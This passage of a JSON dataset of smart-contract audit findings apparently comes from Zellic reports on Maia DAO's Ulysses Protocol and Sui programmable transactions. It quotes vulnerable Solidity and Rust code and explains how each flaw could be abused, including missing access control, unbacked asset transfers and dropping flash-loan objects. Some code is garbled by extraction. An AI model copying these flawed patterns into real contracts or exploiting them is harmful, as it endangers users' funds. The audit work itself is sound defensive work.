generated from user input is encoded with a byte responsible for the type of function to be executed as a result of cross-chain communication. In this case, the byte 0x01 is responsible for adding a new global token. contract CoreBranchRouter is BaseBranchRouter { ...)) function addGlobalToken( address _globalAddress, uint256 _toChain, uint128 _remoteExecutionGas, uint128 _rootExecutionGas ) external payable { bytes memory data = abi.encode(address(this), _globalAddress, _toChain, _rootExecutionGas); bytes memory packedData = abi.encodePacked(bytes1(0x01), data); IBridgeAgent(localBridgeAgentAddress).performSystemCallOut{value: msg.value}( msg.sender, packedData, _remoteExecutionGas ); } ...)) } The performSystemCallOut function encodes the user\u2019s data using a byte 0x00 that de- termines the type of function to be called within the RootBridgeAgent contract. The resulting encoded data is then passed for execution. function performSystemCallOut(address depositor, bytes calldata params, uint128 rootExecutionGas) Zellic Maia DAO external payable lock requiresRouter requiresFallbackGas { bytes memory data = abi.encodePacked(bytes1(0x00), depositNonce, params, msg.value.toUint128(), rootExecutionGas); _depositAndCall(depositor, data, address(0), address(0), 0, 0); /) -> IRootBridgeAgent(rootBridgeAgentAddress).anyExecute(_callData); } During execution, the data will be decoded in the anyExecute function. The 0x00 byte corresponds to the execution of the IRouter(localRouterAddress).anyExecuteRespon se function, which will be called with the decoded data. contract RootBridgeAgent is IRootBridgeAgent { function anyExecute(bytes calldata data) external virtual requiresExecutor returns (bool success, bytes memory result) { ...)) bytes1 flag = data[0]; if (flag =) 0x00) { IRouter(localRouterAddress).anyExecuteResponse(bytes1(data[5]), data[6:data.length - PARAMS_GAS_IN], fromChainId); } else if (flag =) 0x01) { IRouter(localRouterAddress).anyExecute(bytes1(data[5]), data[6:data.length - PARAMS_GAS_IN], fromChainId); emit LogCallin(flag, data, fromChainId); } ...)) } ...)) } But the current implementation of localRouterAddress.anyExecuteResponse supports Zellic Maia DAO only the 0x02 and 0x03 function IDs. Therefore, for the above example with addGlobal Token (0x01 funcId), the anyExecuteResponse will return a false status with an unknown selector message. contract CoreRootRouter is IRootRouter, Ownable { ...)) function anyExecuteResponse(bytes1 funcId, bytes calldata encodedData, uint24 fromChainId) external payable override requiresAgent returns (bool, bytes memory) { ///)) FUNC ID: 2 (_addLocalToken) if (funcId =) 0x02) { (address underlyingAddress, address localAddress, string memory name, string memory symbol) = abi.decode(encodedData, (address, address, string, string)); _addLocalToken(underlyingAddress, localAddress, name, symbol, fromChainId); emit LogCallin(funcId, encodedData, fromChainId); ///)) FUNC ID: 3 (_setLocalToken) } else if (funcId =) 0x03) { (address globalAddress, address localAddress) = abi.decode(encodedData, (address, address)); _setLocalToken(globalAddress, localAddress, fromChainId); emit LogCallin(funcId, encodedData, fromChainId); ///)) Unrecognized Function Selector } else { return (false, \u201dunknown selector\u201d); } return (true, \u201d\u201d); } ...)) } Zellic Maia DAO Another example of a function from CoreBranchRouter that cannot be executed is sync BridgeAgent. This function corresponds to an identifier 0x04 that is also not supported by anyExecuteResponse. contract CoreBranchRouter is BaseBranchRouter { ...)) function syncBridgeAgent(address _newBridgeAgentAddress, address _rootBridgeAgentAddress) external payable { if (!IPort(localPortAddress).isBridgeAgent(_newBridgeAgentAddress)) { } revert UnrecognizedBridgeAgent(); bytes memory data = abi.encode(_newBridgeAgentAddress, _rootBridgeAgentAddress); bytes memory packedData = abi.encodePacked(bytes1(0x04), data); IBridgeAgent(localBridgeAgentAddress).performSystemCallOut{value: msg.value}(msg.sender, packedData, 0); } ...)) } Calling functions that are not supported by the final executor can result in the loss of funds paid for gas and can disrupt the operation of user applications waiting for successful cross-chain function execution. The anyExecute function supports function IDs 0x04 and 0x01. In order to call this function as a result of cross-chain communication, the addGlobalToken and syncBridg eAgent functions should call IBridgeAgent(localBridgeAgentAddress).performCallOut instead of IBridgeAgent(localBridgeAgentAddress).performSystemCallOut. This ensures that the 0x01 flag is encapsulated in the data, allowing the IRouter(loca lRouterAddress).anyExecute function to be called upon decoding. Zellic Maia DAO function anyExecute(bytes1 funcId, bytes calldata encodedData, uint24 fromChainId) external payable override requiresAgent returns (bool, bytes memory) { ///)) FUNC ID: 1 (_addGlobalToken) if (funcId =) 0x01) { (address branchRouter, address globalAddress, uint24 toChain, uint128 remoteExecutionGas) = abi.decode(encodedData, (address, address, uint24, uint128)); _addGlobalToken(remoteExecutionGas, globalAddress, branchRouter, toChain); emit LogCallin(funcId, encodedData, fromChainId); ///)) FUNC ID: 4 (_syncBranchBridgeAgent) } else if (funcId =) 0x04) { (address newBranchBridgeAgent, address rootBridgeAgent) = abi.decode(encodedData, (address, address)); _syncBranchBridgeAgent(newBranchBridgeAgent, rootBridgeAgent, fromChainId); emit LogCallin(funcId, encodedData, fromChainId); ///)) Unrecognized Function Selector } else { return (false, \u201dunknown selector\u201d); } return (true, \u201d\u201d); } This issue has been acknowledged by Maia DAO, and a fix was implemented in com- mit 92ef9cce. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.8 Missing access control on anyExecuteNoSettlement", + "labels": [ + "Zellic" + ], + "body": "Target: CoreBranchRouter Category: Coding Mistakes Likelihood: High Severity: High : High The anyExecuteNoSettlement function is responsible for executing a cross-chain re- quest. It is supposed to be called from the anyExecute function in the BranchBridgeAgent contract. But since the function has no caller verification, anyone can execute it. function anyExecuteNoSettlement(bytes memory _data) external virtual override returns (bool success, bytes memory result) { if (_data[0] =) 0x01) { (, address globalAddress, string memory name, string memory symbol, uint128 gasToBridgeOut) = abi.decode(_data, (bytes1, address, string, string, uint128)); _receiveAddGlobalToken(globalAddress, name, symbol, gasToBridgeOut); ///)) Unrecognized Function Selector } else if (_data[0] =) 0x01) { /)@audit unreachable branch (, address newBridgeAgentFactoryAddress) = abi.decode(_data, (bytes1, address)); _receiveAddBridgeAgentFactory(newBridgeAgentFactoryAddress); ///)) Unrecognized Function Selector } else { return (false, \u201dunknown selector\u201d); } return (true, \u201d\u201d); } Zellic Maia DAO Note that there is an error in the current implementation of the anyExecuteNoSettlem ent function that does not allow calling the function _receiveAddBridgeAgentFactory, since the else if branch cannot be executed. This is because both branches check the equality of _data[0] to 0x01, and the first if will be executed in priority. Since there is no caller verification on the anyExecuteNoSettlement function, any caller is able to execute the _receiveAddGlobalToken function, manipulate the input parame- ters globalAddress, name, symbol, gasToBridgeOut and pass them to the performSyst emCallOut function, which performs a call to the AnycallProxy contract for cross-chain messaging. function _receiveAddGlobalToken( address _globalAddress, string memory _name, string memory _symbol, uint128 _rootExecutionGas ) internal { /)Create Token ERC20hToken newToken = IFactory(hTokenFactoryAddress).createToken(_name, _symbol); /)Encode Data bytes memory data = abi.encode(_globalAddress, newToken); /)Pack FuncId bytes memory packedData = abi.encodePacked(bytes1(0x03), data); /)Send Cross-Chain request IBridgeAgent(localBridgeAgentAddress).performSystemCallOut{value: _rootExecutionGas}( address(this), packedData, 0 ); } Next, as a result of cross-chain communication, the anyExecuteResponse function will be executed and the globalAddress, controlled by the anyExecuteNoSettlement caller, will be passed to the IPort(rootPortAddress).setLocalAddress function. Zellic Maia DAO contract CoreRootRouter is IRootRouter, Ownable { ...)) function anyExecuteResponse(bytes1 funcId, bytes calldata encodedData, uint24 fromChainId) external payable override requiresAgent returns (bool, bytes memory) { ...)) } else if (funcId =) 0x03) { (address globalAddress, address localAddress) = abi.decode(encodedData, (address, address)); _setLocalToken(globalAddress, localAddress, fromChainId); ...)) } function _setLocalToken(address _globalAddress, address _localAddress, uint24 _toChain) internal { IPort(rootPortAddress).setLocalAddress(_globalAddress, _localAddress, _toChain); } } The setLocalAddress function currently allows modifications to the getGlobalAddress FromLocal and getLocalAddressFromGlobal mappings without any checks. This means that the existing getLocalAddressFromGlobal[_fromChain][_globalAddress] value can be overwritten. function setLocalAddress(address _globalAddress, address _localAddress, uint24 _fromChain) external requiresCoreBridgeAgent { getGlobalAddressFromLocal[_fromChain][_localAddress] = _globalAddress; getLocalAddressFromGlobal[_fromChain][_globalAddress] = _localAddress; } Zellic Maia DAO The requiresBridgeAgent modifier should be used to prevent anyone from calling the anyExecuteNoSettlement function. The requiresBridgeAgent modifier was added in commit c73b4c5d. The implementation of the anyExecuteNoSettlement function was fixed in commits d588989e and 92ef9cce. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.9 The protocol fee from pools will be claimed to zero address", + "labels": [ + "Zellic" + ], + "body": "Target: UlyssesFactory Category: Coding Mistakes Likelihood: High Severity: High : High The UlyssesFactory contract enables the creation of new pools contracts and sets its own address as the factory address. Protocol fees collected from the pool contracts are transferred to the owner of the factory. However, the _initializeOwner function is not called in the factory contract, resulting in the factory.owner() returning addres s(0). function claimProtocolFees() external nonReentrant onlyOwner returns (uint256 claimed) { claimed = getProtocolFees(); if (claimed > 0) { asset.safeTransfer(factory.owner(), claimed); } } Since the owner of the UlyssesFactory contract is not set during its creation, it will not be possible to change the owner at a later time. This means that it will also not be possible to withdraw the protocol fee from pool contracts, as the factory.owner() function will return the zero address address(0). In addition, the fee amount cannot be changed, because the setProtocolFee is allowed to be called only by factory.owner(). function setProtocolFee(uint256 _protocolFee) external nonReentrant { if (msg.sender !) factory.owner()) revert Unauthorized(); /) Revert if the protocol fee is larger than 1% if (_protocolFee > MAX_PROTOCOL_FEE) revert InvalidFee(); protocolFee = _protocolFee; } Zellic Maia DAO Pass the owner\u2019s address to the UlyssesFactory constructor and set the owner using the _initializeOwner function. This issue has been acknowledged by Maia DAO, and a fix was implemented in com- mit bd2054cb. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.10 Unlimited cross-chain asset transfer without deposit re- quirement", + "labels": [ + "Zellic" + ], + "body": "Target: RootBridgeAgent Category: Coding Mistakes Likelihood: High Severity: High : High The callOutAndBridge function facilitates the transfer of assets from the root chain to the branch omnichain environment and creates a Settlement object that contains information about the amount of tokens and the addresses involved in the transfer. In the event that the cross-chain call fails or reverts, the anyFallback function is called to reopen the Settlement object and set its status to Pending. This enables a retry through the clearSettlement function. function clearSettlement(uint32 _settlementNonce, uint128 _remoteExecutionGas) external payable { /)Update User Gas available. if (initialGas =) 0) { userFeeInfo.depositedGas = uint128(msg.value); userFeeInfo.gasToBridgeOut = _remoteExecutionGas; } /)Clear Settlement with updated gas. _clearSettlement(_settlementNonce); } The clearSettlement function initiates resending of a failed cross-chain transfer by calling the internal _clearSettlement function. The status of the settlement object is checked to ensure that it is currently in a Pending state before attempting to resend. If the resend is successful, the status of the temporary settlement variable is set to Suc cess. However, it is important to note that the status of the actual Settlement object is not changed during the execution of this function and will remain as Pending. function _clearSettlement(uint32 _settlementNonce) internal requiresFallbackGas { /)Get settlement Settlement memory settlement = _getSettlementEntry(_settlementNonce); Zellic Maia DAO /)Require Status to be Pending require(settlement.status =) SettlementStatus.Pending); /)Update Settlement settlement.status = SettlementStatus.Success; /)Slice last 4 bytes calldata uint128 prevGasToBridgeOut = uint128(bytes16(BytesLib.slice(settlement.callData, settlement.callData.length - 16, 16))); /)abi encodePacked bytes memory newGas = abi.encodePacked(prevGasToBridgeOut + _manageGasOut(settlement.toChain)); /)overwrite last 16bytes of callData for (uint256 i = 0; i < newGas.length;) { settlement.callData[settlement.callData.length - 16 + i] = newGas[i]; unchecked { +)i; } } /)Set Settlement getSettlement[_settlementNonce].callData = settlement.callData; /)Retry call with additional gas _performCall(settlement.callData, settlement.toChain); } Users will be able to move assets from the root chain to the branch omnichain envi- ronment without depositing additional funds. We recommend implementing the status change as shown below: function _clearSettlement(uint32 _settlementNonce) internal requiresFallbackGas { /)Get settlement Zellic Maia DAO Settlement memory settlement = _getSettlementEntry(_settlementNonce); /)Require Status to be Pending require(settlement.status =) SettlementStatus.Pending); /)Update Settlement settlement.status = SettlementStatus.Success; getSettlement[_settlementNonce].status = SettlementStatus.Success; ...)) This issue has been acknowledged by Maia DAO, and a fix was implemented in com- mit 073012d1. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.11 ChainId type confusion", + "labels": [ + "Zellic" + ], + "body": "Target: CoreBranchRouter, RootBridgeAgent, RootPort Category: Coding Mistakes Likelihood: Low Severity: High : Medium To distinguish between the various chains being used, each chain is assigned a unique identifier that determines where cross-chain calls will be executed. Throughout the code, the chain identifier is represented as both uint256 and uint24, which can create issues when data is packed and unpacked without an explicit cast. This occurs in several locations, as illustrated by the following examples: CoreBranchRouter CoreBranchRouter.sol -> addGlobalToken(...))) has _toChain represented as uint256. These parameters are then encoded with abi.encode and passed down to be called cross chain. function addGlobalToken( address _globalAddress, uint256 _toChain, uint128 _remoteExecutionGas, uint128 _rootExecutionGas ) external payable { /)Encode Call Data bytes memory data = abi.encode(address(this), _globalAddress, _toChain, _rootExecutionGas); ...)) } It ends up here, in CoreRootRouter->anyExecute, function anyExecute(bytes1 funcId, bytes calldata encodedData, uint24 fromChainId) external payable override requiresAgent Zellic Maia DAO returns (bool, bytes memory) { ///)) FUNC ID: 1 (_addGlobalToken) if (funcId =) 0x01) { (address branchRouter, address globalAddress, uint24 toChain, uint128 remoteExecutionGas) = abi.decode(encodedData, (address, address, uint24, uint128)); ...))} ...)) } where it is decoded with abi.decode as a uint24. Since the non-packed version of a bi.encode is used, this will work until _toChain some day is picked to be too large to represented as uint24, and then the anyExecute call will start to revert. RootBridgeAgent The function _payExecutionGas(...)), uint24 _fromChain, uint256 _toChain) uses both uint24 and uint256 to represent chains in the same function signature. However, other functions tend to use uint24 to represent it, including functions that do slicing of the input parameters by directly accessing the bytes. RootPort The internal function _getLocalToken looks up a local token address on a different chain, function _getLocalToken(address _localAddress, uint256 _fromChain, uint24 _toChain) internal view returns (address) address globalAddress = getGlobalAddressFromLocal[_fromChain][_localAddress]; return getLocalAddressFromGlobal[_toChain][globalAddress]; { } where _toChain is a uint24, but the mapping getLocalAddressFromGlobal is defined Zellic Maia DAO as mapping(uint256 => mapping(address => address)) public getLocalAddressFromG lobal. Compilers are not able to effectively reason about type safety across abi-encoding and -decoding. In situations where the data types are out of sync, and the target type cannot fit the input, the decoding call will revert. This will happen if, for example, upper bits of chainId are used to store data or the number of chains go beyond 2^24 (unlikely). Not settling on a single representation for the same thing can create confusion for fu- ture development. When doing cross-chain development, it is even more important to make sure everything is synchronized and well-understood across all the chains. Consider using a canonical representation for all logical measurements and identifiers in the codebase. This includes items such as chainId, fees, gas, and other similar val- ues. When using abi.encode, data is slotted into bytes32, which means that there is no advantage in using smaller data types unless they are packed. To ensure that cross- chain data encoding and decoding are working as expected, it is recommended to implement test cases specifically for this purpose. ChainId is now consistently uint24 except for the mappings in the root port. This is done generally to make cross-chain calls cheaper, except in the CoreRootRouter which uses abi.encode for simplicity. (All BridgeAgents use abi.encodePacked to decrease message size) This issue has been acknowledged by Maia DAO, and fixes were implemented in the following commits: 4a120be7 9330339a Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.12 Incorrect accounting of total and strategies debt", + "labels": [ + "Zellic" + ], + "body": "Target: BranchPort Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The approved strategy contract is authorized to borrow assets via the manage function and repay debt via the replenishReserves function, but only up to the amount of res ervesLacking. The _strategy address, which will return debt, amount of tokens, and _token address, is controlled by the caller of the replenishReserves function. The reservesLacking value shows the shortage of tokens needed to reach the mini- mum reserve amount. If reservesLacking is greater than the _amount value, then the _amount will be withdrawn; otherwise, the reservesLacking value will be withdrawn. Regardless of the withdrawal amount, both the getPortStrategyTokenDebt and getSt rategyTokenDebt will be reduced by the _amount value. Additionally, the value of the debt strategy will be reduced, not for the strategy that returned the funds but for the strategy that called the function. function replenishReserves(address _strategy, address _token, uint256 _amount) external { if (!isStrategyToken[_token]) revert UnrecognizedStrategyToken(); if (!isPortStrategy[_strategy][_token]) revert UnrecognizedPortStrategy(); uint256 reservesLacking = _reservesLacking(_token); IPortStrategy(_strategy).withdraw(address(this), _token, _amount < reservesLacking ? _amount : reservesLacking); getPortStrategyTokenDebt[msg.sender][_token] -= _amount; getStrategyTokenDebt[_token] -= _amount; emit DebtRepaid(_strategy, _token, _amount); } Zellic Maia DAO The approved strategies contract is able to reduce debt by using funds withdrawn from other strategies. Additionally, there is an issue where if the value of reservesLac king is less than the amount of funds that need to be withdrawn, the debt counters will be reduced inaccurately. This can result in an incorrect calculation of the minimum number of reserves. For example, 1. Current token balance is 100 tokens, the getMinimumTokenReserveRatio[_token] is 1000, the _minimumReserves is 10 tokens, and _excessReserves is 90 tokens. 2. The strategy is borrowed; all possible tokens amount 90 tokens. 3. The getStrategyTokenDebt[_token] = 90 tokens. 4. The currBalance is equal to 10 tokens and _minimumReserves is still 10 tokens. 5. The replenishReserves function is called with _amount = 10 tokens. 6. Because the _reservesLacking is 0, the strategy will withdraw nothing, but getS trategyTokenDebt[_token] will reduced by _amount. 7. After changing the getStrategyTokenDebt[_token] without changing the balance, the _minimumReserves became equal to 9 tokens, but the currBalance is still equal to 10 tokens. So the _excessReserves will return 1 token, and strategies will be able to borrow again. uint256 internal constant DIVISIONER = 1e4; function _excessReserves(address _token) internal view returns (uint256) { uint256 currBalance = ERC20(_token).balanceOf(address(this)); uint256 minReserves = _minimumReserves(currBalance, _token); return currBalance > minReserves ? currBalance - minReserves : 0; } function _reservesLacking(address _token) internal view returns (uint256) { uint256 currBalance = ERC20(_token).balanceOf(address(this)); uint256 minReserves = _minimumReserves(currBalance, _token); return currBalance < minReserves ? minReserves - currBalance : 0; } Zellic Maia DAO function _minimumReserves(uint256 _currBalance, address _token) internal view returns (uint256) { return ((_currBalance + getStrategyTokenDebt[_token]) * getMinimumTokenReserveRatio[_token]) / DIVISIONER; } We recommend implementing the function as shown below. Add a new amount vari- able equal to the actual number of withdrawn tokens and reduce getPortStrategyTo kenDebt and getStrategyTokenDebt values by amount: function replenishReserves(address _strategy, address _token, uint256 _amount) external { ...)) uint256 amount = _amount < reservesLacking ? _amount : reservesLacking; IPortStrategy(_strategy).withdraw(address(this), _token, _amount < reservesLacking ? _amount : reservesLacking); IPortStrategy(_strategy).withdraw(address(this), _token, amount); getPortStrategyTokenDebt[msg.sender][_token] -= _amount; getPortStrategyTokenDebt[_strategy][_token] -= amount; getStrategyTokenDebt[_token] -= _amount; getStrategyTokenDebt[_token] -= amount; emit DebtRepaid(_strategy, _token, _amount); emit DebtRepaid(_strategy, _token, amount); } This issue has been acknowledged by Maia DAO, and fixes were implemented in the following commits: c11c18a1 Zellic Maia DAO d04e441f Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.13 Bridging assets erroneously mints new assets", + "labels": [ + "Zellic" + ], + "body": "Target: ArbitrumBranchPort Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The functions bridgeIn and bridgeInMultiple are supposed to increase the local hTok en supply by bridging assets into the Arbitrum Branch. No assets are supposed to be minted here, only transferred from the RootPort. This can be done by calling RootPor t->bridgeToLocalBranch with a deposit equal to 0. Instead, these functions both call mintToLocalBranch, which bridges nothing and mints new hTokens every time. More tokens than expected will be minted, and the tokens will not leave the RootPort. This mistake can possibly be manually fixed by selectively burning. Depending on the exact use of the tokens, inflation of the number of tokens might be detrimental. Replace calls to mintToLocalBranch with bridgeToLocalBranch instead and set the cor- rect amount and deposits so that no new tokens are minted. This issue has been acknowledged by Maia DAO, and a fix was implemented in com- mit 0fecbc05. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.14 Lack of input validation", + "labels": [ + "Zellic" + ], + "body": "Target: Multiple Contracts Category: Coding Mistakes Likelihood: Low The following functions lack input validation. Severity: Informational : Low 1. In the BranchBridgeAgent contract, The anyFallback function lacks a check that the getDeposit contains the _depositNonce. 2. In the UlyssesFactory contract, The createToken function lacks a check that the pools contains the input poolIds[i]. The createPools function lacks a check that assets contains zero addresses. 3. In the UlyssesPool contract, The swapIn and swapFromPool functions lack a check that the assets is not zero. 4. In the UlyssesToken contract, The addAsset function lacks a check that the _weight is not zero. The setWeights function lacks a check that the _weights contains zero amounts. 5. In the ERC4626MultiToken contract, The constructor lacks a check that the _weights contains zero amounts. 6. In the ERC20hTokenBranchFactory contract, The initialize lacks a check that the _coreRouter is not zero address. 7. In the ERC20hTokenRootFactory contract, The constructor lacks a check that the rootPortAddress is not zero address. The initialize lacks a check that the _coreRouter is not zero address. 8. In the RootBridgeAgentFactory contract, The constructor lacks a check that the wrappedNativeToken, rootPortAddre ss, and daoAddress are not zero addresses. Zellic Maia DAO 9. In the BranchBridgeAgentFactory contract, The createBridgeAgent lacks a validation of _rootBridgeAgentAddress. 10. In the ERC20hTokenRoot contract, The constructor lacks a check that the factoryAddress and rootPortAddre ss is not zero address. 11. In the BranchBridgeAgent contract, The constructor lacks a check that the all passed addresses is not zero. The _clearDeposit lacks a check that the getDeposit[_depositNonce] ex- ists. 12. In the ArbitrumBranchPort contract, The constructor lacks a check that the rootPortAddress address is not zero. 13. In the BranchPort contract, The initialize lacks a check that the coreBranchRouterAddress and _brid geAgentFactory addresses are not zero. The setCoreRouter lacks a check that the _newCoreRouter address is not zero. 14. In the BaseBranchRouter contract, The initialize lacks a check that the localBridgeAgentAddress address is not zero. 15. In the CoreBranchRouter contract, The constructor lacks a check that the localPortAddress and hTokenFacto ryAddress addresses are not zero. 16. In the BasePortGauge contract, The constructor lacks a check that the _bRouter address is not zero. 17. In the CoreRootRouter contract, The constructor lacks a check that the _wrappedNativeToken and _rootPor tAddress addresses are not zero. The initialize lacks a check that the _bridgeAgentAddress and _hTokenFa ctory addresses are not zero. 18. In the MulticallRootRouter contract, The constructor lacks a check that the _localPortAddress and _multicall Address addresses are not zero. Zellic Maia DAO The initialize lacks a check that the _bridgeAgentAddress address is not zero. 19. In the RootBridgeAgent contract, The constructor lacks a check that all passed addresses are not zero. The _reopenSettlement lacks a check that the getSettlement[_settlementN once] exists. The callOutAndBridge lacks a check that the IPort(localPortAddress).get LocalTokenFromGlobal() and the IPort(localPortAddress).getUnderlying TokenFromLocal return nonzero addresses The callOutAndBridgeMultiple lacks a check that the IPort(localPortAddr ess).getLocalTokenFromGlobal() and the IPort(localPortAddress).getUn derlyingTokenFromLocal return nonzero addresses. The _bridgeIn lacks a check that the IPort(localPortAddress).getGlobalT okenFromLocal() returns nonzero addresses. The _gasSwapIn and _gasSwapOut lack a check that the IPort(localPortAdd ress).getGasPoolInfo returns nonzero addresses. 20. In the RootPort contract, The constructor lacks a check that the _wrappedNativeToken address is not zero. The initialize lacks a check that the _bridgeAgentFactory and _coreRoot Router addresses are not zero. The initializeCore lacks a check that the _coreLocalBranchBridgeAgent and _localBranchPortAddress addresses are not zero. The forefeitOwnership lacks a check that the _owner address is not zero. The setLocalBranchPort lacks a check that the _branchPort address is not zero. The setUnderlyingAddress, setAddresses, setLocalAddress, addNewChain, in itializeEcosystemTokenAddresses, and addEcosystemTokenToChain lack ver- ification that adding token addresses does not lead to overwriting previ- ously added ones. The mint, burn, bridgeToRoot, bridgeToRootFromLocalBranch, bridgeToLoca lBranch,and burnFromLocalBranch lack a check that the hToken address is actually created over ERC20hTokenRootFactory. If important input parameters are not checked, especially in functions that are avail- able for any user to call, it can result in functionality issues and unnecessary gas usage and can even be the root cause of critical problems. It is crucial to properly validate Zellic Maia DAO input parameters to ensure the correct execution of a function and prevent any unin- tended consequences. Consider adding require statements and necessary checks to the above functions. This issue has been acknowledged by Maia DAO, and a fix was implemented in com- mit 6ba3df02. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.15 Lack of new owner address check", + "labels": [ + "Zellic" + ], + "body": "Target: Multiple Category: Coding Mistakes Likelihood: Low Severity: Low : Informational The smart contracts UlyssesPool, UlyssesToken, BranchPort, BranchBridgeAgentFac- tory, and ERC20hTokenBranch inherit from the solady/auth/Ownable.sol contract and use the _initializeOwner function to assign an owner to the contract. The owner\u2019s ad- dress is provided by the caller within the constructor. However, there are no checks in place to ensure that the address of the new owner is not a zero address. Further- more, the _initializeOwner function does not validate this either. If a zero address is set as the owner during contract deployment, the contract will deploy successfully but the contract owner will not be set. This can potentially lead to an inability to perform certain functions, such as modifying the contract state. We recommend implementing proper validation checks inside the constructor func- tion before the _initializeOwner function execution in the UlyssesPool, UlyssesToken, BranchPort, BranchBridgeAgentFactory, and ERC20hTokenBranch contracts. This issue has been acknowledged by Maia DAO, and a fix was implemented in com- mit da4751e6. Not fixed for the UlyssesToken contract. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.16 Addresses may accidentally be overwritten", + "labels": [ + "Zellic" + ], + "body": "Target: RootPort Category: Coding Mistakes Likelihood: Low Severity: Low : Informational The addEcosystemTokenToChain function may only be called by the contract owner. It adds entries to the double mappings getGlobalAddressFromLocal and getLocalAd dressFromGlobal, which map between local and global address on a specific chain. However, there are no checks done to ensure that the mapping is not already set. function addEcosystemTokenToChain(address ecoTokenGlobalAddress, address ecoTokenLocalAddress, uint256 toChainId) external onlyOwner { } getGlobalAddressFromLocal[toChainId][ecoTokenLocalAddress] = ecoTokenGlobalAddress; getLocalAddressFromGlobal[toChainId][ecoTokenGlobalAddress] = ecoTokenLocalAddress; This can modify the addresses set by setAddresses, which is a function that can only It also ends up replicating the behavior in a be called by a coreRootRouterAddress. different function with a different modifier: function setLocalAddress(address _globalAddress, address _localAddress, uint24 _fromChain) external requiresCoreBridgeAgent { } getGlobalAddressFromLocal[_fromChain][_localAddress] = _globalAddress; getLocalAddressFromGlobal[_fromChain][_globalAddress] = _localAddress; Zellic Maia DAO The addEcosystemTokenToChain function can change addresses set by the core root router and vice versa. It is likely unintended that the owner can accidentally overwrite addresses that result from cross-chain communication. If it is intentional that the owner should be able to override addresses set by the router, then consider renaming the add function to set. Otherwise, introduce a requirement that the address is not already set, possibly with a parameter that can override the behavior. This issue has been acknowledged by Maia DAO, and fixes were implemented in the following commits: 728ee138 8b17cb59 Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.17 Ownable contracts allow renouncing", + "labels": [ + "Zellic" + ], + "body": "Target: Multiple Contracts; e.g., BranchBridgeAgentFactory, RootPort, Branch- Port, UlyssesToken, UlyssesPool Category: Coding Mistakes Likelihood: Low Severity: Low : Informational The renounceOwnership() function is included by default in contracts that inherit the Ownable contract. In some cases, this functionality is used intentionally, such as to initialize a contract and then permanently disable the possibility of initializing it again by renouncing ownership. However, in other contracts, the owner functionality is used throughout the contract for important functionality. If an owner accidentally re- nounces ownership, this permanently stops anyone from calling these critical func- tions. Therefore, it is important to use caution when using renounceOwnership() and to ensure that it is used only when necessary and intentional. Depending on which contract becomes unusable, the impact could vary. It could result in the loss of funds or the loss of configurability of contracts, potentially requiring redeployment. In contracts that require an active owner, override renounceOwnership() with a func- tion that reverts. The Ownable contract contains a two-step ownership transfer pro- cedure that can be used to change ownership in a secure way. This issue has been acknowledged by Maia DAO, and a fix was implemented in com- mit ce37be6d. Note that UlyssesPool and UlyssesToken were not added because users or proto- cols may want to make the Pool or Token completely decentralized by \u201cfreezing\u201d contract parameters. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Command results without the drop ability could be dropped", + "labels": [ + "Zellic" + ], + "body": "Target: Programmable Transactions Category: Coding Mistakes Likelihood: High Severity: Critical : Critical Programmable transaction commands can return a result containing one or more ob- jects. Those objects can be used as inputs to subsequent commands, for example as inputs to a Move call or transferred to an address. All objects without the drop ability must be used before the transaction ends. This is enforced by the ExecutionContext:)finish function, which checks the type and abil- ities for each result from the commands executed. However, the implementation of the function for values of type Some(Value:)Raw(RawValueType:)Loaded)) is currently incomplete. Some(Value:)Raw(RawValueType:)Loaded { abilities, .) }, _)) => { /) - nothing to check for drop /) - if it does not have drop, but has copy, /) the last usage must be by value in order to \u201dlie\u201d and say that the /) last usage is actually a take instead of a clone /) - Otherwise, an error if abilities.has_drop() { } else if abilities.has_copy() &) !matches!(last_usage_kind, Some(UsageKind:)ByValue)) { let msg = \u201dThe value has copy, but not drop. Its last usage must be by-value so it can be taken.\u201d; return Err(ExecutionError:)new_with_source( ExecutionErrorKind:)UnusedValueWithoutDrop { result_idx: i as u16, secondary_idx: j as u16, }, msg, )); } Zellic Mysten Labs The logic for handling results that have drop or copy is implemented, but values that have neither ability are passed through, instead of causing an error as per the speci- fication. This violates the specified property of programmable transactions and could allow results without both drop and copy to be dropped. Notably, data types that represent coins and capabilities typically do not have those abilities, including the standard Sui framework data type for representing coins. Additionally, a common implementation of flash loans gives the borrower an object representing the loan position that does not have the drop ability. In order to correctly finish the transaction, this object must be destroyed by giving it back to the lender contract together with the lent funds and interests. This vulnerability would allow to break the security of such a system by dropping the object regardless of its declared abilities. Implement a third condition in the if/else block shown above that would return an E xecutionErrorKind:)UnusedValueWithoutDrop for types where !abilities.has_copy() is true. This issue has been acknowledged by Mysten Labs, and a fix was implemented in commit 8109e2e4. Zellic Mysten Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Move and Sui Security 